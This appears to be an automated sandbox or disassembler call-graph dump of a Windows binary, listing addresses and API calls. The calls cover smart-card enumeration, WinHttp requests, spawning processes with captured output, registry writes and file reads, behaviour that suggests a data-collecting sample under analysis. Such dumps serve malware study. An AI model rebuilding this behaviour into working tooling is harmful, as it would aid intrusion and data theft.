5 API calls 4573->4574 4575 7ff7cb876897 4574->4575 4576 7ff7cb877234 5 API calls 4575->4576 4577 7ff7cb8768b6 4576->4577 4578 7ff7cb87b424 4579 7ff7cb87b447 4578->4579 4580 7ff7cb871990 4 API calls 4579->4580 4581 7ff7cb87b452 4580->4581 4582 7ff7cb871990 4 API calls 4581->4582 4583 7ff7cb87b461 4582->4583 4584 7ff7cb87b885 4583->4584 4585 7ff7cb87b482 4583->4585 4586 7ff7cb871990 4 API calls 4584->4586 4587 7ff7cb87b4ab 4585->4587 4588 7ff7cb87b732 4585->4588 4589 7ff7cb87b899 4586->4589 4591 7ff7cb871990 4 API calls 4587->4591 4590 7ff7cb871990 4 API calls 4588->4590 4593 7ff7cb871990 4 API calls 4589->4593 4592 7ff7cb87b742 4590->4592 4606 7ff7cb87b4bb 4591->4606 4598 7ff7cb871990 4 API calls 4592->4598 4594 7ff7cb87b8ad 4593->4594 4596 7ff7cb871a70 5 API calls 4594->4596 4595 7ff7cb87b721 4597 7ff7cb871990 4 API calls 4595->4597 4624 7ff7cb87b883 4596->4624 4603 7ff7cb87b730 4597->4603 4600 7ff7cb87b756 4598->4600 4599 7ff7cb871990 4 API calls 4601 7ff7cb87b8ce 4599->4601 4602 7ff7cb871a70 5 API calls 4600->4602 4602->4603 4604 7ff7cb871990 4 API calls 4603->4604 4605 7ff7cb87b77c SCardListCardsW 4604->4605 4607 7ff7cb87b83e 4605->4607 4608 7ff7cb87b7b5 4605->4608 4606->4595 4609 7ff7cb8719e4 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4606->4609 4612 7ff7cb87b527 SCardGetStatusChangeW 4606->4612 4619 7ff7cb871a70 wvsprintfW GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4606->4619 4627 7ff7cb87b5bb SCardListCardsW 4606->4627 4628 7ff7cb871990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4606->4628 4629 7ff7cb871990 4 API calls 4606->4629 4611 7ff7cb871990 4 API calls 4607->4611 4610 7ff7cb871990 4 API calls 4608->4610 4609->4606 4626 7ff7cb87b7c5 4610->4626 4614 7ff7cb87b84e 4611->4614 4612->4606 4613 7ff7cb87b820 4615 7ff7cb871990 4 API calls 4613->4615 4616 7ff7cb871990 4 API calls 4614->4616 4618 7ff7cb87b82f SCardFreeMemory 4615->4618 4617 7ff7cb87b862 4616->4617 4620 7ff7cb871a70 5 API calls 4617->4620 4621 7ff7cb87b874 4618->4621 4619->4606 4620->4621 4622 7ff7cb871990 4 API calls 4621->4622 4622->4624 4623 7ff7cb8719e4 4 API calls 4623->4626 4624->4599 4625 7ff7cb871990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4625->4626 4626->4613 4626->4623 4626->4625 4627->4606 4628->4606 4630 7ff7cb87b672 SCardFreeMemory 4629->4630 4630->4606 4631 7ff7cb87250c 4636 7ff7cb87213c 4631->4636 4634 7ff7cb87253b 4679 7ff7cb871c80 4636->4679 4639 7ff7cb8725b4 2 API calls 4640 7ff7cb87219e 4639->4640 4641 7ff7cb8724e6 4640->4641 4642 7ff7cb8721ba WinHttpCrackUrl 4640->4642 4641->4634 4668 7ff7cb871eec 4641->4668 4643 7ff7cb8724dd WinHttpCloseHandle 4642->4643 4644 7ff7cb8721e6 4642->4644 4643->4641 4645 7ff7cb8721f7 WinHttpConnect 4644->4645 4645->4643 4646 7ff7cb872225 4645->4646 4647 7ff7cb87228b WinHttpOpenRequest 4646->4647 4648 7ff7cb8724cd WinHttpCloseHandle 4647->4648 4649 7ff7cb8722ba 4647->4649 4648->4643 4650 7ff7cb872304 WinHttpSendRequest 4649->4650 4651 7ff7cb8722c0 WinHttpQueryOption WinHttpSetOption 4649->4651 4652 7ff7cb87232b WinHttpReceiveResponse 4650->4652 4653 7ff7cb8724c4 WinHttpCloseHandle 4650->4653 4651->4650 4652->4653 4654 7ff7cb87233e 4652->4654 4653->4648 4655 7ff7cb87e7c8 2 API calls 4654->4655 4656 7ff7cb87234d WinHttpQueryDataAvailable 4655->4656 4657 7ff7cb87e6d8 4 API calls 4656->4657 4658 7ff7cb87236d WinHttpReadData 4657->4658 4659 7ff7cb87238b 4658->4659 4659->4656 4660 7ff7cb87e728 4 API calls 4659->4660 4662 7ff7cb87239f 4659->4662 4660->4659 4661 7ff7cb8724ba 4661->4653 4662->4661 4683 7ff7cb877a60 4662->4683 4707 7ff7cb871de8 4668->4707 4671 7ff7cb871f5e SysAllocString SafeArrayCreateVector SafeArrayAccessData 4713 7ff7cb87262c 4671->4713 4672 7ff7cb872121 4672->4634 4675 7ff7cb871ffe SysFreeString 4675->4672 4677 7ff7cb871fd9 4677->4675 4678 7ff7cb871cbc 11 API calls 4677->4678 4678->4675 4680 7ff7cb871ca1 4679->4680 4681 7ff7cb871ca5 WinHttpOpen 4680->4681 4682 7ff7cb8779f0 2 API calls 4680->4682 4681->4639 4682->4681 4684 7ff7cb877a84 4683->4684 4686 7ff7cb8724a5 4683->4686 4695 7ff7cb8725dc GetProcessHeap HeapAlloc 4684->4695 4687 7ff7cb871cbc 4686->4687 4696 7ff7cb87a51c 4687->4696 4697 7ff7cb87a54d 4696->4697 4706 7ff7cb8725dc GetProcessHeap HeapAlloc 4697->4706 4715 7ff7cb871b74 4707->4715 4709 7ff7cb871e06 RegCreateKeyExA 4710 7ff7cb871e3f CoInitializeEx VariantInit CoCreateInstance 4709->4710 4711 7ff7cb871e46 4709->4711 4710->4671 4710->4672 4712 7ff7cb871ea2 RegSetValueExA RegCloseKey 4711->4712 4712->4710 4714 7ff7cb871fa8 SafeArrayUnaccessData 4713->4714 4714->4677 4716 7ff7cb871bc3 4715->4716 4716->4709 4107 7ff7cb879ac8 4108 7ff7cb879af7 4107->4108 4109 7ff7cb871990 4 API calls 4108->4109 4110 7ff7cb879b02 4109->4110 4244 7ff7cb879644 4110->4244 4112 7ff7cb879b0b 4112->4112 4249 7ff7cb87900c 4112->4249 4115 7ff7cb87a4e0 4117 7ff7cb871990 4 API calls 4115->4117 4118 7ff7cb87a4f8 4117->4118 4119 7ff7cb879b7a 4119->4115 4284 7ff7cb8797dc 4119->4284 4122 7ff7cb871990 4 API calls 4123 7ff7cb879bb4 4122->4123 4124 7ff7cb8797dc 16 API calls 4123->4124 4125 7ff7cb879bcc 4124->4125 4125->4115 4126 7ff7cb871990 4 API calls 4125->4126 4127 7ff7cb879bdf 4126->4127 4128 7ff7cb8797dc 16 API calls 4127->4128 4129 7ff7cb879bf7 4128->4129 4129->4115 4130 7ff7cb871990 4 API calls 4129->4130 4131 7ff7cb879c0a 4130->4131 4132 7ff7cb8797dc 16 API calls 4131->4132 4133 7ff7cb879c22 4132->4133 4133->4115 4134 7ff7cb871990 4 API calls 4133->4134 4135 7ff7cb879c35 4134->4135 4136 7ff7cb8797dc 16 API calls 4135->4136 4137 7ff7cb879c4d 4136->4137 4137->4115 4138 7ff7cb871990 4 API calls 4137->4138 4139 7ff7cb879c60 4138->4139 4140 7ff7cb8797dc 16 API calls 4139->4140 4141 7ff7cb879c78 4140->4141 4141->4115 4142 7ff7cb871990 4 API calls 4141->4142 4143 7ff7cb879c8b 4142->4143 4144 7ff7cb8797dc 16 API calls 4143->4144 4145 7ff7cb879ca3 4144->4145 4145->4115 4146 7ff7cb871990 4 API calls 4145->4146 4147 7ff7cb879cb6 4146->4147 4148 7ff7cb8797dc 16 API calls 4147->4148 4149 7ff7cb879cce 4148->4149 4149->4115 4150 7ff7cb871990 4 API calls 4149->4150 4151 7ff7cb879ce1 4150->4151 4152 7ff7cb8797dc 16 API calls 4151->4152 4153 7ff7cb879cf9 4152->4153 4153->4115 4154 7ff7cb871990 4 API calls 4153->4154 4155 7ff7cb879d0c 4154->4155 4156 7ff7cb8797dc 16 API calls 4155->4156 4157 7ff7cb879d24 4156->4157 4157->4115 4158 7ff7cb871990 4 API calls 4157->4158 4159 7ff7cb879d37 4158->4159 4160 7ff7cb8797dc 16 API calls 4159->4160 4161 7ff7cb879d4f 4160->4161 4161->4115 4162 7ff7cb871990 4 API calls 4161->4162 4163 7ff7cb879d62 4162->4163 4164 7ff7cb8797dc 16 API calls 4163->4164 4165 7ff7cb879d7a 4164->4165 4165->4115 4166 7ff7cb871990 4 API calls 4165->4166 4167 7ff7cb879d8d 4166->4167 4168 7ff7cb8797dc 16 API calls 4167->4168 4169 7ff7cb879da5 4168->4169 4169->4115 4170 7ff7cb871990 4 API calls 4169->4170 4171 7ff7cb879db8 4170->4171 4172 7ff7cb8797dc 16 API calls 4171->4172 4173 7ff7cb879dd0 4172->4173 4173->4115 4174 7ff7cb871990 4 API calls 4173->4174 4175 7ff7cb879de3 4174->4175 4175->4175 4176 7ff7cb8797dc 16 API calls 4175->4176 4177 7ff7cb879e43 4176->4177 4177->4115 4178 7ff7cb871990 4 API calls 4177->4178 4179 7ff7cb879e56 4178->4179 4179->4179 4180 7ff7cb8797dc 16 API calls 4179->4180 4181 7ff7cb879eb2 4180->4181 4181->4115 4182 7ff7cb871990 4 API calls 4181->4182 4183 7ff7cb879ec5 4182->4183 4183->4183 4184 7ff7cb8797dc 16 API calls 4183->4184 4185 7ff7cb879f2e 4184->4185 4185->4115 4186 7ff7cb871990 4 API calls 4185->4186 4187 7ff7cb879f41 4186->4187 4187->4187 4188 7ff7cb8797dc 16 API calls 4187->4188 4189 7ff7cb879f9d 4188->4189 4189->4115 4190 7ff7cb871990 4 API calls 4189->4190 4191 7ff7cb879fb4 4190->4191 4191->4191 4192 7ff7cb8797dc 16 API calls 4191->4192 4193 7ff7cb87a006 4192->4193 4193->4115 4194 7ff7cb871990 4 API calls 4193->4194 4195 7ff7cb87a01d 4194->4195 4195->4195 4196 7ff7cb8797dc 16 API calls 4195->4196 4197 7ff7cb87a078 4196->4197 4197->4115 4198 7ff7cb871990 4 API calls 4197->4198 4199 7ff7cb87a092 4198->4199 4199->4199 4200 7ff7cb8797dc 16 API calls 4199->4200 4201 7ff7cb87a0e4 4200->4201 4201->4115 4202 7ff7cb871990 4 API calls 4201->4202 4203 7ff7cb87a0f7 4202->4203 4203->4203 4204 7ff7cb8797dc 16 API calls 4203->4204 4205 7ff7cb87a151 4204->4205 4205->4115 4206 7ff7cb871990 4 API calls 4205->4206 4207 7ff7cb87a164 4206->4207 4207->4207 4208 7ff7cb8797dc 16 API calls 4207->4208 4209 7ff7cb87a1bd 4208->4209 4209->4115 4210 7ff7cb871990 4 API calls 4209->4210 4211 7ff7cb87a1d7 4210->4211 4211->4211 4212 7ff7cb8797dc 16 API calls 4211->4212 4213 7ff7cb87a225 4212->4213 4213->4115 4214 7ff7cb871990 4 API calls 4213->4214 4215 7ff7cb87a238 4214->4215 4215->4215 4216 7ff7cb8797dc 16 API calls 4215->4216 4217 7ff7cb87a289 4216->4217 4217->4115 4218 7ff7cb871990 4 API calls 4217->4218 4219 7ff7cb87a29c 4218->4219 4219->4219 4220 7ff7cb8797dc 16 API calls 4219->4220 4221 7ff7cb87a2e6 4220->4221 4221->4115 4222 7ff7cb871990 4 API calls 4221->4222 4223 7ff7cb87a2f9 4222->4223 4223->4223 4224 7ff7cb8797dc 16 API calls 4223->4224 4225 7ff7cb87a347 4224->4225 4225->4115 4226 7ff7cb871990 4 API calls 4225->4226 4227 7ff7cb87a35a 4226->4227 4227->4227 4228 7ff7cb8797dc 16 API calls 4227->4228 4229 7ff7cb87a3a0 4228->4229 4229->4115 4230 7ff7cb871990 4 API calls 4229->4230 4231 7ff7cb87a3b3 4230->4231 4231->4231 4232 7ff7cb8797dc 16 API calls 4231->4232 4233 7ff7cb87a419 4232->4233 4233->4115 4234 7ff7cb871990 4 API calls 4233->4234 4235 7ff7cb87a42c 4234->4235 4235->4235 4236 7ff7cb8797dc 16 API calls 4235->4236 4237 7ff7cb87a47b 4236->4237 4237->4115 4238 7ff7cb871990 4 API calls 4237->4238 4239 7ff7cb87a48a 4238->4239 4239->4239 4240 7ff7cb8797dc 16 API calls 4239->4240 4241 7ff7cb87a4d3 4240->4241 4241->4115 4242 7ff7cb87a4d7 4241->4242 4333 7ff7cb879478 4242->4333 4349 7ff7cb87e7c8 4244->4349 4247 7ff7cb87e7c8 2 API calls 4248 7ff7cb879672 4247->4248 4248->4112 4353 7ff7cb872554 4249->4353 4252 7ff7cb879069 4258 7ff7cb871990 4 API calls 4252->4258 4253 7ff7cb8790a3 CreatePipe 4254 7ff7cb8790e8 CreatePipe 4253->4254 4255 7ff7cb8790c1 4253->4255 4256 7ff7cb879106 4254->4256 4257 7ff7cb879130 4254->4257 4259 7ff7cb871990 4 API calls 4255->4259 4263 7ff7cb871990 4 API calls 4256->4263 4355 7ff7cb877cfc 4257->4355 4260 7ff7cb87907d GetLastError 4258->4260 4261 7ff7cb8790d5 GetLastError 4259->4261 4262 7ff7cb87908e 4260->4262 4261->4262 4266 7ff7cb871a70 5 API calls 4262->4266 4264 7ff7cb87911a GetLastError 4263->4264 4264->4262 4268 7ff7cb87909c 4266->4268 4267 7ff7cb87917b CreateProcessW 4359 7ff7cb8725b4 4267->4359 4268->4115 4276 7ff7cb8795a0 WaitForSingleObject 4268->4276 4270 7ff7cb8791c7 4271 7ff7cb8791cb 4270->4271 4272 7ff7cb8791f5 CloseHandle 4270->4272 4273 7ff7cb871990 4 API calls 4271->4273 4272->4268 4274 7ff7cb8791df GetLastError 4273->4274 4275 7ff7cb8791f0 4274->4275 4275->4272 4277 7ff7cb879600 4276->4277 4278 7ff7cb8795c3 4276->4278 4277->4119 4279 7ff7cb8795d4 4278->4279 4363 7ff7cb87968c PeekNamedPipe 4278->4363 4279->4277 4281 7ff7cb8795ee GetExitCodeProcess 4279->4281 4282 7ff7cb87968c 6 API calls 4279->4282 4281->4277 4283 7ff7cb8795ea 4282->4283 4283->4277 4283->4281 4285 7ff7cb871990 4 API calls 4284->4285 4286 7ff7cb879813 4285->4286 4286->4286 4287 7ff7cb871990 4 API calls 4286->4287 4288 7ff7cb879877 4287->4288 4377 7ff7cb8779f0 4288->4377 4291 7ff7cb8719e4 4 API calls 4292 7ff7cb87988d 4291->4292 4293 7ff7cb8725b4 2 API calls 4292->4293 4294 7ff7cb879895 4293->4294 4295 7ff7cb871990 4 API calls 4294->4295 4296 7ff7cb8798a4 4295->4296 4381 7ff7cb879224 GetSystemTimeAsFileTime 4296->4381 4299 7ff7cb87e6d8 4 API calls 4300 7ff7cb8798cd 4299->4300 4301 7ff7cb87e6d8 4 API calls 4300->4301 4302 7ff7cb8798ed 4301->4302 4303 7ff7cb871990 4 API calls 4302->4303 4331 7ff7cb8799cf 4302->4331 4305 7ff7cb87993f 4303->4305 4304 7ff7cb871a70 5 API calls 4306 7ff7cb8799ef 4304->4306 4307 7ff7cb879943 4305->4307 4308 7ff7cb879950 4305->4308 4309 7ff7cb871990 4 API calls 4306->4309 4310 7ff7cb8719e4 4 API calls 4307->4310 4312 7ff7cb8779f0 2 API calls 4308->4312 4311 7ff7cb8799fe 4309->4311 4313 7ff7cb87994e 4310->4313 4311->4115 4311->4122 4314 7ff7cb879958 4312->4314 4316 7ff7cb871990 4 API calls 4313->4316 4315 7ff7cb8719e4 4 API calls 4314->4315 4317 7ff7cb879966 4315->4317 4318 7ff7cb87997d 4316->4318 4319 7ff7cb8725b4 2 API calls 4317->4319 4320 7ff7cb871990 4 API calls 4318->4320 4319->4313 4321 7ff7cb879991 4320->4321 4322 7ff7cb879995 4321->4322 4323 7ff7cb8799a2 4321->4323 4324 7ff7cb8719e4 4 API calls 4322->4324 4325 7ff7cb8779f0 2 API calls 4323->4325 4326 7ff7cb8799a0 4324->4326 4327 7ff7cb8799aa 4325->4327 4329 7ff7cb871990 4 API calls 4326->4329 4328 7ff7cb8719e4 4 API calls 4327->4328 4330 7ff7cb8799b8 4328->4330 4329->4331 4332 7ff7cb8725b4 2 API calls 4330->4332 4331->4304 4332->4326 4403 7ff7cb87971c 4333->4403 4336 7ff7cb8794cf 4337 7ff7cb87968c 6 API calls 4336->4337 4338 7ff7cb8794fc WaitForSingleObject 4336->4338 4340 7ff7cb879540 4336->4340 4347 7ff7cb879534 TerminateProcess 4336->4347 4337->4336 4339 7ff7cb879512 GetSystemTimeAsFileTime 4338->4339 4341 7ff7cb87954d 4338->4341 4339->4336 4340->4115 4341->4340 4342 7ff7cb879563 4341->4342 4343 7ff7cb87968c 6 API calls 4341->4343 4342->4340 4344 7ff7cb87957d GetExitCodeProcess 4342->4344 4345 7ff7cb87968c 6 API calls 4342->4345 4343->4342 4344->4340 4346 7ff7cb87958f CloseHandle 4344->4346 4348 7ff7cb879579 4345->4348 4346->4340 4347->4340 4348->4340 4348->4344 4352 7ff7cb8725dc GetProcessHeap HeapAlloc 4349->4352 4351 7ff7cb87965f 4351->4247 4354 7ff7cb872561 CreatePipe 4353->4354 4354->4252 4354->4253 4356 7ff7cb877d0e 4355->4356 4362 7ff7cb8725dc GetProcessHeap HeapAlloc 4356->4362 4358 7ff7cb877d1d 4358->4267 4360 7ff7cb8725b9 GetProcessHeap HeapFree 4359->4360 4361 7ff7cb8725da 4359->4361 4360->4361 4361->4270 4364 7ff7cb8796c2 4363->4364 4369 7ff7cb8796ca 4363->4369 4364->4369 4370 7ff7cb87e6d8 4364->4370 4367 7ff7cb879701 4374 7ff7cb87e728 4367->4374 4369->4279 4371 7ff7cb8796dc ReadFile 4370->4371 4372 7ff7cb87e6f5 4370->4372 4371->4367 4371->4369 4372->4372 4373 7ff7cb872654 4 API calls 4372->4373 4373->4371 4375 7ff7cb87e6d8 4 API calls 4374->4375 4376 7ff7cb87e73d 4375->4376 4376->4369 4378 7ff7cb877a0d 4377->4378 4380 7ff7cb877a09 4377->4380 4401 7ff7cb8725dc GetProcessHeap HeapAlloc 4378->4401 4380->4291 4382 7ff7cb879264 4381->4382 4402 7ff7cb8725dc GetProcessHeap HeapAlloc 4382->4402 4384 7ff7cb8792b1 4385 7ff7cb87971c WriteFile 4384->4385 4386 7ff7cb8792fe 4385->4386 4387 7ff7cb8725b4 GetProcessHeap HeapFree 4386->4387 4392 7ff7cb879306 4387->4392 4388 7ff7cb8793a2 WaitForSingleObject 4390 7ff7cb8793b8 GetSystemTimeAsFileTime 4388->4390 4391 7ff7cb8793f5 4388->4391 4389 7ff7cb87968c 6 API calls 4389->4392 4390->4392 4391->4299 4392->4388 4392->4389 4392->4391 4393 7ff7cb879418 WaitForSingleObject 4392->4393 4397 7ff7cb8793e9 TerminateProcess 4392->4397 4393->4391 4394 7ff7cb87942e 4393->4394 4395 7ff7cb87943e 4394->4395 4398 7ff7cb87968c 6 API calls 4394->4398 4395->4391 4396 7ff7cb879458 GetExitCodeProcess 4395->4396 4399 7ff7cb87968c 6 API calls 4395->4399 4396->4391 4397->4391 4398->4395 4400 7ff7cb879454 4399->4400 4400->4391 4400->4396 4404 7ff7cb87974b 4403->4404 4406 7ff7cb8794ba GetSystemTimeAsFileTime 4404->4406 4407 7ff7cb8797a4 WriteFile 4404->4407 4406->4336 4408 7ff7cb8797c7 4407->4408 4408->4404 4717 7ff7cb87dc08 4718 7ff7cb87dc5c 4717->4718 4719 7ff7cb871990 4 API calls 4718->4719 4720 7ff7cb87dc92 4719->4720 4721 7ff7cb871990 4 API calls 4720->4721 4722 7ff7cb87dca9 4721->4722 4845 7ff7cb87cbf0 RegOpenKeyExW 4722->4845 4724 7ff7cb87dcc9 4725 7ff7cb871990 4 API calls 4724->4725 4726 7ff7cb87dd2c 4725->4726 4727 7ff7cb871990 4 API calls 4726->4727 4728 7ff7cb87dd43 4727->4728 4729 7ff7cb87ccf4 6 API calls 4728->4729 4730 7ff7cb87dd68 4729->4730 4731 7ff7cb87deaf 4730->4731 4733 7ff7cb87dd7c PathCombineW PathFileExistsW 4730->4733 4732 7ff7cb871990 4 API calls 4731->4732 4734 7ff7cb87debe 4732->4734 4735 7ff7cb87de9c 4733->4735 4736 7ff7cb87dda2 PathQuoteSpacesW 4733->4736 4740 7ff7cb871990 4 API calls 4734->4740 4737 7ff7cb8725b4 2 API calls 4735->4737 4851 7ff7cb87cfec 4736->4851 4737->4731 4739 7ff7cb87ddb8 lstrcatW 4853 7ff7cb87e8a0 4739->4853 4742 7ff7cb87ded5 4740->4742 4744 7ff7cb87cbf0 4 API calls 4742->4744 4746 7ff7cb87deee 4744->4746 4745 7ff7cb879644 2 API calls 4749 7ff7cb87dde2 4745->4749 4747 7ff7cb871990 4 API calls 4746->4747 4748 7ff7cb87df0a 4747->4748 4750 7ff7cb871990 4 API calls 4748->4750 4749->4749 4752 7ff7cb87900c 16 API calls 4749->4752 4751 7ff7cb87df19 4750->4751 4755 7ff7cb871990 4 API calls 4751->4755 4753 7ff7cb87de37 4752->4753 4754 7ff7cb8795a0 8 API calls 4753->4754 4759 7ff7cb87de7d 4753->4759 4756 7ff7cb87de4c 4754->4756 4757 7ff7cb87df30 4755->4757 4758 7ff7cb87de73 4756->4758 4760 7ff7cb8797dc 16 API calls 4756->4760 4761 7ff7cb87df3c GetEnvironmentVariableW 4757->4761 4762 7ff7cb879478 13 API calls 4758->4762 4763 7ff7cb8725b4 2 API calls 4759->4763 4764 7ff7cb87de60 4760->4764 4765 7ff7cb87df65 4761->4765 4766 7ff7cb87e1e3 4761->4766 4762->4759 4763->4735 4764->4758 4769 7ff7cb871990 4 API calls 4764->4769 4770 7ff7cb87df71 PathAppendW PathFileExistsW 4765->4770 4767 7ff7cb871990 4 API calls 4766->4767 4768 7ff7cb87e1f2 4767->4768 4773 7ff7cb871990 4 API calls 4768->4773 4769->4758 4770->4766 4771 7ff7cb87df96 CreateFileW 4770->4771 4771->4766 4772 7ff7cb87dfcb GetFileSize 4771->4772 4860 7ff7cb8725dc GetProcessHeap HeapAlloc 4772->4860 4775 7ff7cb87e209 4773->4775 4779 7ff7cb87cbf0 4 API calls 4775->4779 4780 7ff7cb87e226 4779->4780 4784 7ff7cb871990 4 API calls 4780->4784 4786 7ff7cb87e242 4784->4786 4789 7ff7cb871990 4 API calls 4786->4789 4790 7ff7cb87e259 4789->4790 4794 7ff7cb87e265 GetEnvironmentVariableW 4790->4794 4795 7ff7cb87e378 4794->4795 4796 7ff7cb87e288 4794->4796 4798 7ff7cb871990 4 API calls 4795->4798 4799 7ff7cb87e294 PathAppendW PathFileExistsW 4796->4799 4800 7ff7cb87e387 4798->4800 4799->4795 4803 7ff7cb87e2b9 CreateFileW 4799->4803 4804 7ff7cb871990 4 API calls 4800->4804 4803->4795 4808 7ff7cb87e2ee GetFileSize 4803->4808 4809 7ff7cb87e396 4804->4809 4861 7ff7cb872588 GetProcessHeap HeapAlloc 4808->4861 4846 7ff7cb87ccd3 4845->4846 4847 7ff7cb87cc43 RegEnumKeyExW 4845->4847 4846->4724 4848 7ff7cb87cc79 RegEnumKeyExW 4847->4848 4849 7ff7cb87ccc8 RegCloseKey 4847->4849 4848->4849 4849->4846 4852 7ff7cb87d047 4851->4852 4852->4739 4854 7ff7cb87e7c8 2 API calls 4853->4854 4855 7ff7cb87e8bf 4854->4855 4862 7ff7cb87e74c 4855->4862 4858 7ff7cb87e6d8 4 API calls 4859 7ff7cb87ddd5 4858->4859 4859->4745 4863 7ff7cb87e793 4862->4863 4865 7ff7cb87e767 4862->4865 4863->4858 4864 7ff7cb87e6d8 4 API calls 4864->4865 4865->4863 4865->4864 4866 7ff7cb8714d4 4867 7ff7cb871507 4866->4867 4868 7ff7cb8714ea 4866->4868 4868->4867 4869 7ff7cb871501 RemoveVectoredExceptionHandler 4868->4869 4869->4867 4870 7ff7cb8768d4 4871 7ff7cb8768f7 4870->4871 4872 7ff7cb877234 5 API calls 4871->4872 4873 7ff7cb876971 4872->4873 4874 7ff7cb877234 5 API calls 4873->4874 4875 7ff7cb876990 4874->4875 4876 7ff7cb877234 5 API calls 4875->4876 4877 7ff7cb8769af 4876->4877 4878 7ff7cb8772d4 5 API calls 4877->4878 4879 7ff7cb8769ce 4878->4879 4880 7ff7cb876054 4881 7ff7cb876077 4880->4881 4882 7ff7cb877234 5 API calls 4881->4882 4883 7ff7cb8760f1 4882->4883 4884 7ff7cb877234 5 API calls 4883->4884 4885 7ff7cb876110 4884->4885 4886 7ff7cb877234 5 API calls 4885->4886 4887 7ff7cb87612f 4886->4887 4888 7ff7cb877234 5 API calls 4887->4888 4889 7ff7cb87619e 4888->4889 4890 7ff7cb877234 5 API calls 4889->4890 4891 7ff7cb8761bd 4890->4891 4892 7ff7cb8772d4 5 API calls 4891->4892 4893 7ff7cb8761dc 4892->4893 4894 7ff7cb876b94 4895 7ff7cb876bbf 4894->4895 4896 7ff7cb877234 5 API calls 4895->4896 4897 7ff7cb876c2e 4896->4897 4898 7ff7cb877234 5 API calls 4897->4898 4899 7ff7cb876c9d 4898->4899 4900 7ff7cb877234 5 API calls 4899->4900 4901 7ff7cb876d09 4900->4901 4902 7ff7cb87e4d0 lstrcpyW PathAppendW 4903 7ff7cb87e51c 4902->4903 4904 7ff7cb87ccf4 6 API calls 4903->4904 4905 7ff7cb87e537 4904->4905 4906 7ff7cb87e5ea 4905->4906 4907 7ff7cb871990 4 API calls 4905->4907 4908 7ff7cb87e556 4907->4908 4909 7ff7cb8719e4 4 API calls 4908->4909 4910 7ff7cb87e561 4909->4910 4911 7ff7cb871990 4 API calls 4910->4911 4912 7ff7cb87e578 4911->4912 4913 7ff7cb8719e4 4 API calls 4912->4913 4914 7ff7cb87e587 4913->4914 4914->4914 4915 7ff7cb871990 4 API calls 4914->4915 4916 7ff7cb87e5de 4915->4916 4917 7ff7cb8725b4 2 API calls 4916->4917 4917->4906 4002 7ff7cb8773fc 4003 7ff7cb87743f 4002->4003 4004 7ff7cb871990 4 API calls 4003->4004 4005 7ff7cb87746e 4004->4005 4050 7ff7cb871a70 4005->4050 4007 7ff7cb877490 4008 7ff7cb871a70 5 API calls 4007->4008 4009 7ff7cb8774a4 4008->4009 4053 7ff7cb8778ec 4009->4053 4012 7ff7cb871990 4 API calls 4013 7ff7cb8774c5 4012->4013 4014 7ff7cb871a70 5 API calls 4013->4014 4015 7ff7cb8774d9 4014->4015 4059 7ff7cb8779c4 GetNativeSystemInfo 4015->4059 4018 7ff7cb871990 4 API calls 4019 7ff7cb8774fa 4018->4019 4061 7ff7cb877138 CoInitializeEx CoInitializeSecurity CoCreateInstance 4019->4061 4021 7ff7cb877503 4026 7ff7cb8775d1 4021->4026 4062 7ff7cb87785c 4021->4062 4022 7ff7cb87783c 4073 7ff7cb877104 4022->4073 4026->4022 4027 7ff7cb87785c 5 API calls 4026->4027 4030 7ff7cb877629 4027->4030 4028 7ff7cb87755b 4029 7ff7cb87785c 5 API calls 4028->4029 4032 7ff7cb877596 4029->4032 4031 7ff7cb87785c 5 API calls 4030->4031 4034 7ff7cb877664 4031->4034 4033 7ff7cb87785c 5 API calls 4032->4033 4033->4026 4035 7ff7cb87785c 5 API calls 4034->4035 4036 7ff7cb87769f 4035->4036 4037 7ff7cb87785c 5 API calls 4036->4037 4038 7ff7cb8776da 4037->4038 4039 7ff7cb87785c 5 API calls 4038->4039 4040 7ff7cb877715 4039->4040 4041 7ff7cb87785c 5 API calls 4040->4041 4042 7ff7cb877750 4041->4042 4043 7ff7cb87785c 5 API calls 4042->4043 4044 7ff7cb87778b 4043->4044 4045 7ff7cb87785c 5 API calls 4044->4045 4046 7ff7cb8777c6 4045->4046 4047 7ff7cb87785c 5 API calls 4046->4047 4048 7ff7cb877801 4047->4048 4049 7ff7cb87785c 5 API calls 4048->4049 4049->4022 4051 7ff7cb871918 4 API calls 4050->4051 4052 7ff7cb871a96 wvsprintfW 4051->4052 4052->4007 4054 7ff7cb877918 4053->4054 4055 7ff7cb877977 LoadLibraryA GetProcAddress 4054->4055 4056 7ff7cb8774a9 4055->4056 4057 7ff7cb877991 GetCurrentProcess IsWow64Process 4055->4057 4056->4012 4057->4056 4058 7ff7cb8779ad 4057->4058 4058->4056 4060 7ff7cb8774de 4059->4060 4060->4018 4061->4021 4063 7ff7cb871990 4 API calls 4062->4063 4064 7ff7cb877888 4063->4064 4065 7ff7cb871990 4 API calls 4064->4065 4066 7ff7cb877893 4065->4066 4067 7ff7cb871990 4 API calls 4066->4067 4068 7ff7cb8778a2 4067->4068 4076 7ff7cb877034 4068->4076 4071 7ff7cb871990 4 API calls 4072 7ff7cb8778d5 4071->4072 4072->4028 4074 7ff7cb877116 CoUninitialize 4073->4074 4078 7ff7cb877079 4076->4078 4077 7ff7cb87707d 4077->4071 4078->4077 4080 7ff7cb876004 4078->4080 4081 7ff7cb87601a 4080->4081 4084 7ff7cb877234 4081->4084 4093 7ff7cb877310 4084->4093 4087 7ff7cb876042 4088 7ff7cb877260 4091 7ff7cb871990 4 API calls 4088->4091 4089 7ff7cb871990 4 API calls 4090 7ff7cb877275 4089->4090 4092 7ff7cb8719e4 4 API calls 4090->4092 4091->4087 4092->4088 4094 7ff7cb87733e 4093->4094 4095 7ff7cb877381 4094->4095 4097 7ff7cb877362 4094->4097 4096 7ff7cb8773bb 4095->4096 4098 7ff7cb877395 4095->4098 4099 7ff7cb871990 4 API calls 4096->4099 4101 7ff7cb871a70 5 API calls 4097->4101 4104 7ff7cb871a70 5 API calls 4098->4104 4100 7ff7cb8773ca 4099->4100 4103 7ff7cb871990 4 API calls 4100->4103 4102 7ff7cb877251 4101->4102 4102->4087 4102->4088 4102->4089 4105 7ff7cb8773d5 4103->4105 4104->4102 4106 7ff7cb871990 4 API calls 4105->4106 4106->4102 4925 7ff7cb87ecb8 4926 7ff7cb87ece6 4925->4926 4938 7ff7cb87ee03 4925->4938 4926->4938 4939 7ff7cb8725dc GetProcessHeap HeapAlloc 4926->4939 4940 7ff7cb87c378 4941 7ff7cb87c38b 4940->4941 4942 